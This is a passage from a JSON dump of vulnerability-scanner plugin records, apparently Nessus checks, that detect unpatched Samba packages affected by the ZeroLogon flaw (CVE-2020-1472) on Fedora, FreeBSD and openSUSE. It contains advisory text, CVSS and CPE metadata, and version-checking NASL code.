audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC32\", reference:\"samba-4.12.7-0.fc32\", epoch:\"2\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"2:samba\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:23:13", "description": "The Samba Team reports :\n\nAn unauthenticated attacker on the network can gain administrator access by exploiting a netlogon protocol flaw.", "cvss3": {}, "published": "2020-09-21T00:00:00", "type": "nessus", "title": "FreeBSD : samba -- Unauthenticated domain takeover via netlogon (24ace516-fad7-11ea-8d8c-005056a311d1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2023-05-23T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:samba410", "p-cpe:/a:freebsd:freebsd:samba411", "p-cpe:/a:freebsd:freebsd:samba412", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_24ACE516FAD711EA8D8C005056A311D1.NASL", "href": "https://www.tenable.com/plugins/nessus/140677", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2020 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(140677);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/23\");\n\n script_cve_id(\"CVE-2020-1472\");\n script_xref(name:\"IAVA\", value:\"2020-A-0438-S\");\n script_xref(name:\"IAVA\", value:\"0001-A-0647\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/09/21\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0101\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0008\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0121\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0016\");\n\n script_name(english:\"FreeBSD : samba -- Unauthenticated domain takeover via netlogon (24ace516-fad7-11ea-8d8c-005056a311d1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Samba Team reports :\n\nAn unauthenticated attacker on the network can gain administrator\naccess by exploiting a netlogon protocol flaw.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.samba.org/samba/security/CVE-2020-1472.html\");\n # https://vuxml.freebsd.org/freebsd/24ace516-fad7-11ea-8d8c-005056a311d1.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e92322b7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1472\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/01/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/09/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:samba410\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:samba411\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:samba412\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"samba410<4.10.18\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"samba411<4.11.13\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"samba412<4.12.7\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:23:58", "description": "This update for samba fixes the following issues :\n\n - ZeroLogon: An elevation of privilege was possible with some non default configurations when an attacker established a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC) (CVE-2020-1472, bsc#1176579).\n\n - Update to samba 4.11.13\n\n + s3: libsmb: Fix SMB2 client rename bug to a Windows server; (bso#14403);\n\n + dsdb: Allow 'password hash userPassword schemes = CryptSHA256' to work on RHEL7; (bso#14424);\n\n + dbcheck: Allow a dangling forward link outside our known NCs; (bso#14450);\n\n + lib/debug: Set the correct default backend loglevel to MAX_DEBUG_LEVEL; (bso#14426);\n\n + s3:smbd: PANIC: assert failed in get_lease_type();\n (bso#14428);\n\n + lib/util: do not install 'test_util_paths'; (bso#14370);\n\n + lib:util: Fix smbclient -l basename dir; (bso#14345);\n\n + s3:smbd: PANIC: assert failed in get_lease_type();\n (bso#14428);\n\n + util: Allow symlinks in directory_create_or_exist;\n (bso#14166);\n\n + docs: Fix documentation for require_membership_of of pam_winbind; (bso#14358);\n\n + s3:winbind:idmap_ad: Make failure to get attrnames for schema mode fatal; (bso#14425);\n\nThis update was imported from the SUSE:SLE-15-SP2:Update update project.", "cvss3": {}, "published": "2020-09-30T00:00:00", "type": "nessus", "title": "openSUSE Security Update : samba (openSUSE-2020-1526)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2023-05-23T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:ctdb", "p-cpe:/a:novell:opensuse:ctdb-debuginfo", "p-cpe:/a:novell:opensuse:ctdb-pcp-pmda", "p-cpe:/a:novell:opensuse:ctdb-pcp-pmda-debuginfo", "p-cpe:/a:novell:opensuse:ctdb-tests", "p-cpe:/a:novell:opensuse:ctdb-tests-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc-binding0", "p-cpe:/a:novell:opensuse:libdcerpc-binding0-32bit", "p-cpe:/a:novell:opensuse:libdcerpc-binding0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc-binding0-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc-devel", "p-cpe:/a:novell:opensuse:libdcerpc-samr-devel", "p-cpe:/a:novell:opensuse:libdcerpc-samr0", "p-cpe:/a:novell:opensuse:libdcerpc-samr0-32bit", "p-cpe:/a:novell:opensuse:libdcerpc-samr0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc-samr0-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc0", "p-cpe:/a:novell:opensuse:libdcerpc0-32bit", "p-cpe:/a:novell:opensuse:libdcerpc0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-util0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-util0-debuginfo", "p-cpe:/a:novell:opensuse:libndr-devel", "p-cpe:/a:novell:opensuse:libndr-krb5pac-devel", "p-cpe:/a:novell:opensuse:libndr-krb5pac0", "p-cpe:/a:novell:opensuse:libndr-krb5pac0-32bit", "p-cpe:/a:novell:opensuse:libndr-krb5pac0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libndr-krb5pac0-debuginfo", "p-cpe:/a:novell:opensuse:libndr-nbt-devel", "p-cpe:/a:novell:opensuse:libndr-nbt0", "p-cpe:/a:novell:opensuse:libndr-nbt0-32bit", "p-cpe:/a:novell:opensuse:libndr-nbt0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libndr-nbt0-debuginfo", "p-cpe:/a:novell:opensuse:libndr-standard-devel", "p-cpe:/a:novell:opensuse:libndr-standard0", "p-cpe:/a:novell:opensuse:libndr-standard0-32bit", "p-cpe:/a:novell:opensuse:libndr-standard0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libndr-standard0-debuginfo", "p-cpe:/a:novell:opensuse:libndr0", "p-cpe:/a:novell:opensuse:libndr0-32bit", "p-cpe:/a:novell:opensuse:libndr0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libndr0-debuginfo", "p-cpe:/a:novell:opensuse:libnetapi-devel", "p-cpe:/a:novell:opensuse:libnetapi-devel-32bit", "p-cpe:/a:novell:opensuse:libnetapi0", "p-cpe:/a:novell:opensuse:libnetapi0-32bit", "p-cpe:/a:novell:opensuse:libnetapi0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libnetapi0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-credentials-devel", "p-cpe:/a:novell:opensuse:libsamba-credentials0", "p-cpe:/a:novell:opensuse:libsamba-credentials0-32bit", "p-cpe:/a:novell:opensuse:libsamba-credentials0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-credentials0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-errors-devel", "p-cpe:/a:novell:opensuse:libsamba-errors0", "p-cpe:/a:novell:opensuse:libsamba-errors0-32bit", "p-cpe:/a:novell:opensuse:libsamba-errors0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-errors0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-hostconfig-devel", "p-cpe:/a:novell:opensuse:libsamba-hostconfig0", "p-cpe:/a:novell:opensuse:libsamba-hostconfig0-32bit", "p-cpe:/a:novell:opensuse:libsamba-hostconfig0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-hostconfig0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-passdb-devel", "p-cpe:/a:novell:opensuse:libsamba-passdb0", "p-cpe:/a:novell:opensuse:libsamdb-devel", "p-cpe:/a:novell:opensuse:libsamdb0", "p-cpe:/a:novell:opensuse:libsamdb0-32bit", "p-cpe:/a:novell:opensuse:libsamdb0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsamdb0-debuginfo", "p-cpe:/a:novell:opensuse:libsmbclient-devel", "p-cpe:/a:novell:opensuse:libsmbclient0", "p-cpe:/a:novell:opensuse:libsmbclient0-32bit", "p-cpe:/a:novell:opensuse:libsmbclient0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsmbclient0-debuginfo", "p-cpe:/a:novell:opensuse:libsmbconf-devel", "p-cpe:/a:novell:opensuse:libsmbconf0", "p-cpe:/a:novell:opensuse:samba-libs-32bit", "p-cpe:/a:novell:opensuse:samba-libs-32bit-debuginfo", "p-cpe:/a:novell:opensuse:samba-libs-debuginfo", "p-cpe:/a:novell:opensuse:samba-libs-python3", "p-cpe:/a:novell:opensuse:samba-libs-python3-32bit", "p-cpe:/a:novell:opensuse:samba-libs-python3-32bit-debuginfo", "p-cpe:/a:novell:opensuse:samba-libs-python3-debuginfo", "p-cpe:/a:novell:opensuse:samba-python3", "p-cpe:/a:novell:opensuse:samba-python3-debuginfo", "p-cpe:/a:novell:opensuse:samba-test", "p-cpe:/a:novell:opensuse:samba-test-debuginfo", "p-cpe:/a:novell:opensuse:samba-winbind", "p-cpe:/a:novell:opensuse:samba-winbind-32bit", "p-cpe:/a:novell:opensuse:samba-winbind-32bit-debuginfo", "p-cpe:/a:novell:opensuse:samba-winbind-debuginfo", "cpe:/o:novell:opensuse:15.2", "p-cpe:/a:novell:opensuse:libsamba-passdb0-32bit", "p-cpe:/a:novell:opensuse:libsamba-passdb0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-passdb0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-policy-devel", "p-cpe:/a:novell:opensuse:libsamba-policy-python3-devel", "p-cpe:/a:novell:opensuse:libsamba-policy0-python3", "p-cpe:/a:novell:opensuse:libsamba-policy0-python3-32bit", "p-cpe:/a:novell:opensuse:libsamba-policy0-python3-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-policy0-python3-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-util-devel", "p-cpe:/a:novell:opensuse:libsamba-util0", "p-cpe:/a:novell:opensuse:libsamba-util0-32bit", "p-cpe:/a:novell:opensuse:libsmbconf0-32bit", "p-cpe:/a:novell:opensuse:libsmbconf0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsmbconf0-debuginfo", "p-cpe:/a:novell:opensuse:libsmbldap-devel", "p-cpe:/a:novell:opensuse:libsmbldap2", "p-cpe:/a:novell:opensuse:libsmbldap2-32bit", "p-cpe:/a:novell:opensuse:libsmbldap2-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsmbldap2-debuginfo", "p-cpe:/a:novell:opensuse:libtevent-util-devel", "p-cpe:/a:novell:opensuse:libtevent-util0", "p-cpe:/a:novell:opensuse:libtevent-util0-32bit", "p-cpe:/a:novell:opensuse:libtevent-util0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libtevent-util0-debuginfo", "p-cpe:/a:novell:opensuse:libwbclient-devel", "p-cpe:/a:novell:opensuse:libwbclient0", "p-cpe:/a:novell:opensuse:libwbclient0-32bit", "p-cpe:/a:novell:opensuse:libwbclient0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libwbclient0-debuginfo", "p-cpe:/a:novell:opensuse:samba", "p-cpe:/a:novell:opensuse:samba-ad-dc", "p-cpe:/a:novell:opensuse:samba-ad-dc-32bit", "p-cpe:/a:novell:opensuse:samba-ad-dc-32bit-debuginfo", "p-cpe:/a:novell:opensuse:samba-ad-dc-debuginfo", "p-cpe:/a:novell:opensuse:samba-ceph", "p-cpe:/a:novell:opensuse:samba-ceph-debuginfo", "p-cpe:/a:novell:opensuse:samba-client", "p-cpe:/a:novell:opensuse:samba-client-32bit", "p-cpe:/a:novell:opensuse:samba-client-32bit-debuginfo", "p-cpe:/a:novell:opensuse:samba-client-debuginfo", "p-cpe:/a:novell:opensuse:samba-core-devel", "p-cpe:/a:novell:opensuse:samba-debuginfo", "p-cpe:/a:novell:opensuse:samba-debugsource", "p-cpe:/a:novell:opensuse:samba-dsdb-modules", "p-cpe:/a:novell:opensuse:samba-dsdb-modules-debuginfo", "p-cpe:/a:novell:opensuse:samba-libs"], "id": "OPENSUSE-2020-1526.NASL", "href": "https://www.tenable.com/plugins/nessus/141072", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2020-1526.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(141072);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/23\");\n\n script_cve_id(\"CVE-2020-1472\");\n script_xref(name:\"IAVA\", value:\"2020-A-0438-S\");\n script_xref(name:\"IAVA\", value:\"0001-A-0647\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/09/21\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0101\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0008\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0121\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0016\");\n\n script_name(english:\"openSUSE Security Update : samba (openSUSE-2020-1526)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for samba fixes the following issues :\n\n - ZeroLogon: An elevation of privilege was possible with\n some non default configurations when an attacker\n established a vulnerable Netlogon secure channel\n connection to a domain controller, using the Netlogon\n Remote Protocol (MS-NRPC) (CVE-2020-1472, bsc#1176579).\n\n - Update to samba 4.11.13\n\n + s3: libsmb: Fix SMB2 client rename bug to a Windows\n server; (bso#14403);\n\n + dsdb: Allow 'password hash userPassword schemes =\n CryptSHA256' to work on RHEL7; (bso#14424);\n\n + dbcheck: Allow a dangling forward link outside our known\n NCs; (bso#14450);\n\n + lib/debug: Set the correct default backend loglevel to\n MAX_DEBUG_LEVEL; (bso#14426);\n\n + s3:smbd: PANIC: assert failed in get_lease_type();\n (bso#14428);\n\n + lib/util: do not install 'test_util_paths'; (bso#14370);\n\n + lib:util: Fix smbclient -l basename dir; (bso#14345);\n\n + s3:smbd: PANIC: assert failed in get_lease_type();\n (bso#14428);\n\n + util: Allow symlinks in directory_create_or_exist;\n (bso#14166);\n\n + docs: Fix documentation for require_membership_of of\n pam_winbind; (bso#14358);\n\n + s3:winbind:idmap_ad: Make failure to get attrnames for\n schema mode fatal; (bso#14425);\n\nThis update was imported from the SUSE:SLE-15-SP2:Update update\nproject.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1176579\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected samba packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1472\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/09/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-pcp-pmda\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-pcp-pmda-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-tests\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-tests-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-binding0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-binding0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-binding0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-binding0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-standard-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-standard0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-standard0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-standard0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-standard0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-errors-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-errors0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-errors0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-errors0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-errors0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy-python3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy0-python3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy0-python3-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy0-python3-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy0-python3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", 